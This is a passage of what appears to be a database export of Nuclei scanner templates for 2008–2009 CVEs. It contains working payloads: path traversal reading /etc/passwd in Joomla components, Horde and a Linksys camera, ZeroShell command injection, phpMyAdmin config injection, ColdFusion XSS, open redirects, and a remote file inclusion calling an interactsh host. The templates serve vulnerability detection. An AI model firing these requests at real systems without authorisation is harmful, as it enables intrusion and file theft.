siteengine\n shodan-query: html:\"SiteEngine\"\n tags: cve,cve2008,redirect,siteengine,boka\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api.php?action=logout&forward=http://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950", "hash": "303f0321124ca825249a00350dae7261", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e54" }, "name": "CVE-2009-0347.yaml", "content": "id: CVE-2009-0347\n\ninfo:\n name: Autonomy Ultraseek - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.\n impact: |\n An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks.\n remediation: |\n Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2009-0347\n - https://www.exploit-db.com/exploits/32766\n - https://www.kb.cert.org/vuls/id/202753\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/48336\n - http://sunbeltblog.blogspot.com/2009/01/constant-stream-of-ultraseek-redirects.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P\n cvss-score: 5.8\n cve-id: CVE-2009-0347\n cwe-id: CWE-59\n epss-score: 0.10607\n epss-percentile: 0.94532\n cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: autonomy\n product: ultraseek\n tags: cve,cve2009,redirect,autonomy\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cs.html?url=http://www.interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100cf3670c23a13df5e6953abeb0b31099f649dedb0d0f8d27279f83729a6dfa817022100892363b09ea6413d98fec323ec8d65cc59e55bfc00166958fbaff5ac83e0f192:922c64590222798bb761d5b6d8e72950", "hash": "ed9520f3490853145dd49baef08594a3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e55" }, "name": "CVE-2009-0545.yaml", "content": "id: CVE-2009-0545\n\ninfo:\n name: ZeroShell <= 1.0beta11 Remote Code Execution\n author: geeknik\n severity: critical\n description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of ZeroShell.\n reference:\n - https://www.exploit-db.com/exploits/8023\n - https://nvd.nist.gov/vuln/detail/CVE-2009-0545\n - http://www.zeroshell.net/eng/announcements/\n - http://www.ikkisoft.com/stuff/LC-2009-01.txt\n - http://www.vupen.com/english/advisories/2009/0385\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2009-0545\n cwe-id: CWE-20\n epss-score: 0.97081\n epss-percentile: 0.99755\n cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zeroshell\n product: zeroshell\n tags: cve,cve2009,edb,zeroshell,kerbynet,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22\"\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4b0a00483046022100b390e617f8d9be114aea50840c529aab08fac1822e4dece7746cb7733a409631022100b30c36b38ea49931b16615862de2267a59370daf662b7e77c88b25add453fb8e:922c64590222798bb761d5b6d8e72950", "hash": "31a1822de19bc85bcdb85d3384538518", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e56" }, "name": "CVE-2009-0932.yaml", "content": "id: CVE-2009-0932\n\ninfo:\n name: Horde/Horde Groupware - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware.\n reference:\n - https://www.exploit-db.com/exploits/16154\n - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5\n - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2\n - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.413.2.5\n - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.503\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N\n cvss-score: 6.4\n cve-id: CVE-2009-0932\n cwe-id: CWE-22\n epss-score: 0.04048\n epss-percentile: 0.919\n cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: debian\n product: horde\n tags: cve,cve2009,horde,lfi,traversal,edb,debian\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220752ee73ce2196cc54c39a5e60377c58c87e7ef7ef489fd990d2b463b6ddd900402204885ac378662f0bf728920184aab940b6d54ebdb022e1767ebc9b7e4283d8ad1:922c64590222798bb761d5b6d8e72950", "hash": "e632ce26af4bd1b525c6c47c47e0b903", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e57" }, "name": "CVE-2009-1151.yaml", "content": "id: CVE-2009-1151\n\ninfo:\n name: PhpMyAdmin Scripts - Remote Code Execution\n author: princechaddha\n severity: high\n description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.\n remediation: |\n Update PhpMyAdmin to the latest version or apply the necessary patches.\n reference:\n - https://www.phpmyadmin.net/security/PMASA-2009-3/\n - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433\n - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301\n - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php\n - https://nvd.nist.gov/vuln/detail/CVE-2009-1151\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-1151\n cwe-id: CWE-94\n epss-score: 0.79256\n epss-percentile: 0.98197\n cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phpmyadmin\n product: phpmyadmin\n tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce\n\nhttp:\n - raw:\n - |\n POST /scripts/setup.php HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n action=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d034c615116d4e4388066b8ecd70006fb486a97f1893f14acdd83c4b1d48a2ec02200b87edb8aa8815371b589ebc0773ca1f591ef511e9f6dfb2c4a6bdc6cfc624f8:922c64590222798bb761d5b6d8e72950", "hash": "b48c4d5412c4dbc66cd8d997f05ac4f9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e58" }, "name": "CVE-2009-1496.yaml", "content": "id: CVE-2009-1496\n\ninfo:\n name: Joomla! Cmimarketplace 0.1 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: |\n Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/8367\n - https://nvd.nist.gov/vuln/detail/CVE-2009-1496\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2009-1496\n cwe-id: CWE-22\n epss-score: 0.00802\n epss-percentile: 0.81288\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve2009,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220058c6301672453287635b209959b9ac18463e075a84677673e28deef2283f91a0221009ef0ec653e81bc72e2c7d58deff90a7f85cba1e35851c7a2ae9f20d1d9ff24d5:922c64590222798bb761d5b6d8e72950", "hash": "fda2ff7c175439c375c78a5a79090874", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e59" }, "name": "CVE-2009-1558.yaml", "content": "id: CVE-2009-1558\n\ninfo:\n name: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/32954\n - http://www.vupen.com/english/advisories/2009/1173\n - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/\n - https://nvd.nist.gov/vuln/detail/CVE-2009-1558\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/50231\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2009-1558\n cwe-id: CWE-22\n epss-score: 0.01101\n epss-percentile: 0.84137\n cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: wvc54gca\n tags: cve2009,cve,iot,linksys,camera,traversal,lfi,cisco,firmware,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220350ec03119d612c5f8713699db8e69ed0b506879bc6ee64e2d75bba83968464502204f724f9426b0b6fc4ebc02416b6f5dc37095ea0970d13a9fa55961eec88551f1:922c64590222798bb761d5b6d8e72950", "hash": "ba48d072debddacf20a9e60a69520ae8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5a" }, "name": "CVE-2009-1872.yaml", "content": "id: CVE-2009-1872\n\ninfo:\n name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting\n author: princechaddha\n severity: medium\n description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.\n reference:\n - https://www.tenable.com/cve/CVE-2009-1872\n - http://www.adobe.com/support/security/bulletins/apsb09-12.html\n - http://www.dsecrg.com/pages/vul/show.php?id=122\n - https://nvd.nist.gov/vuln/detail/CVE-2009-1872\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2009-1872\n cwe-id: CWE-79\n epss-score: 0.37553\n epss-percentile: 0.97102\n cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: adobe\n product: coldfusion\n shodan-query: http.component:\"Adobe ColdFusion\"\n tags: cve2009,cve,adobe,xss,coldfusion,tenable\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210099e04590b72f5f59dff9760d627e7042601a45b16bea2c23852fa76186fae5ab0220361a0788e7674d6ed82b5e924aace4e3d604f237ac2666fa79b1e91830fd2e1a:922c64590222798bb761d5b6d8e72950", "hash": "55d3fc98bc02e56bb20a47a8ef8d12f2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5b" }, "name": "CVE-2009-2015.yaml", "content": "id: CVE-2009-2015\n\ninfo:\n name: Joomla! MooFAQ 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).\n impact: |\n The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.\n remediation: |\n Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.\n reference:\n - https://www.exploit-db.com/exploits/8898\n - http://www.vupen.com/english/advisories/2009/1530\n - https://nvd.nist.gov/vuln/detail/CVE-2009-2015\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-2015\n cwe-id: CWE-22\n epss-score: 0.01197\n epss-percentile: 0.84862\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve,cve2009,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210084264e87dd97831fdd770570139d33f282ca38d9dd2d90eb80aa16ac245aade0022100a38d28caf33176434cefef437a45a72f7bce297b01a68dc9d0ffc0ec18545cda:922c64590222798bb761d5b6d8e72950", "hash": "271df5fa5356048844c0103cc45db4b6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5c" }, "name": "CVE-2009-2100.yaml", "content": "id: CVE-2009-2100\n\ninfo:\n name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: |\n Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/8946\n - https://nvd.nist.gov/vuln/detail/CVE-2009-2100\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2009-2100\n cwe-id: CWE-22\n epss-score: 0.00779\n epss-percentile: 0.80973\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve2009,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220011b812bacaed12772d45c7485d04136e35b9196b4c435b488601681c7bb3be50220722ab9dd33d98de09bfaec078bfd702692da5772714e412426ee37084ac9b862:922c64590222798bb761d5b6d8e72950", "hash": "38529333fa820fc478f90fcf6c5b6969", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5d" }, "name": "CVE-2009-3053.yaml", "content": "id: CVE-2009-3053\n\ninfo:\n name: Joomla! Agora 3.0.0b - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/9564\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964\n - https://nvd.nist.gov/vuln/detail/CVE-2009-3053\n - http://www.exploit-db.com/exploits/9564\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2009-3053\n cwe-id: CWE-22\n epss-score: 0.00447\n epss-percentile: 0.74489\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve2009,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b1484271cee40bf0b4aea6f4d71ca3af8dbc80c595ae0ac214b2c4a50f9e208d02206d398d3a43e76b1fe42dd939684c2051143435d1f0dabe2491f7e7e9cf780c28:922c64590222798bb761d5b6d8e72950", "hash": "157932a5667bdc79a6191553d2e5ace7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5e" }, "name": "CVE-2009-3318.yaml", "content": "id: CVE-2009-3318\n\ninfo:\n name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.\n impact: |\n The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure.\n remediation: |\n Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates.\n reference:\n - https://www.exploit-db.com/exploits/9706\n - https://nvd.nist.gov/vuln/detail/CVE-2009-3318\n - http://www.exploit-db.com/exploits/9706\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-3318\n cwe-id: CWE-22\n epss-score: 0.00706\n epss-percentile: 0.79951\n cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\n tags: cve2009,cve,joomla,lfi,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bc8b6fb22e490512109118ecf32279b8742eb0391a184c91700c91da8b4591eb022100c82312184befa6261e4804c856191e828d49e06fd6f09184837202906a4f1d4e:922c64590222798bb761d5b6d8e72950", "hash": "25a7c92e23e6cba700ff3f49cc6eee0f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e5f" }, "name": "CVE-2009-4202.yaml", "content": "id: CVE-2009-4202\n\ninfo:\n name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion\n author: daffainfo\n severity: high\n description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: |\n Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/8870\n - http://www.vupen.com/english/advisories/2009/1494\n - https://nvd.nist.gov/vuln/detail/CVE-2009-4202\n - http://www.exploit-db.com/exploits/8870\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-4202\n cwe-id: CWE-22\n epss-score: 0.01956\n epss-percentile: 0.87449\n cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\\!\n tags: cve,cve2009,joomla,lfi,photo,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202c777774f99408aa53f9024ed173c4b5f653295367409e9b42c256336d3a3ad4022100ea93147fd00a0eba5c9c1ff6e8a48bba81f4df36c20ecf450a8a67a0b887c5cf:922c64590222798bb761d5b6d8e72950", "hash": "6732827e15dba0011e997f92d524b5c4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e60" }, "name": "CVE-2009-4223.yaml", "content": "id: CVE-2009-4223\n\ninfo:\n name: KR-Web <=1.1b2 - Remote File Inclusion\n author: geeknik\n severity: high\n description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.\n impact: |\n An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure.\n remediation: |\n Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability.\n reference:\n - https://sourceforge.net/projects/krw/\n - https://www.exploit-db.com/exploits/10216\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395\n - http://www.exploit-db.com/exploits/10216\n - https://nvd.nist.gov/vuln/detail/CVE-2009-4223\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-4223\n cwe-id: CWE-94\n epss-score: 0.00611\n epss-percentile: 0.764\n cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gianni_tommasi\n product: kr-php_web_content_server\n tags: cve,cve2009,krweb,rfi,edb,gianni_tommasi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b7331565010d84c002b7cf2f7a86ffaad9ed7987a6af7ed386d0c1fdfc4a2870022100ad93d7312e808e09e1bafe8a62c52b228ef426c7d5a7dcce76a2d12acb50c0fa:922c64590222798bb761d5b6d8e72950", "hash": "da2b62ad70a972b740b85fedc10fea49", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e61" }, "name": "CVE-2009-4679.yaml", "content": "id: CVE-2009-4679\n\ninfo:\n name: Joomla! Portfolio Nexus - Remote File Inclusion\n author: daffainfo\n severity: high\n description: |\n Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/33440\n - https://nvd.nist.gov/vuln/detail/CVE-2009-4679\n - http://www.exploit-db.com/exploits/10754\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2009-4679\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: inertialfate\n product: com_if_nexus\n tags: cve2009,cve,joomla,lfi,nexus,edb,inertialfate\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022009e6d9fc063d9f363f1aa17a21509658c7830c53762598097f52e1f597f91c33022064ff511367ec547436041cce6d239bfe563e64bb05e8d8c7743fd1edb3d777db:922c64590222798bb761d5b6d8e72950", "hash": "3b534a70eb9b833951944745fc356fab", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e62" }, "name": "CVE-2009-5020.yaml", "content": "id: CVE-2009-5020\n\ninfo:\n name: AWStats < 6.95 - Open Redirect\n author: pdteam\n severity: medium\n description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n impact: |\n Allows attackers to redirect users to malicious websites or phishing pages.\n remediation: Apply all relevant security patches and product upgrades.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2009-5020\n - http://awstats.sourceforge.net/docs/awstats_changelog.txt\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P\n cvss-score: 5.8\n cve-id: CVE-2009-5020\n cwe-id: CWE-20\n epss-score: 0.00215\n epss-percentile: 0.59474\n cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: awstats\n product: awstats\n tags: cve2009,cve,redirect,awstats\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'\n - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a00483046022100e3ee0cfc04525ca64e6f63073fa38f5db6ee44776907c68d8f5e190a19649a9a022100c21acec79450886ccc34a6c7737411102d641536ee3d33788522fb5fd5cf6f15:922c64590222798bb761d5b6d8e72950", "hash": "b66b35748e838b5552f76e57e3b57504", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 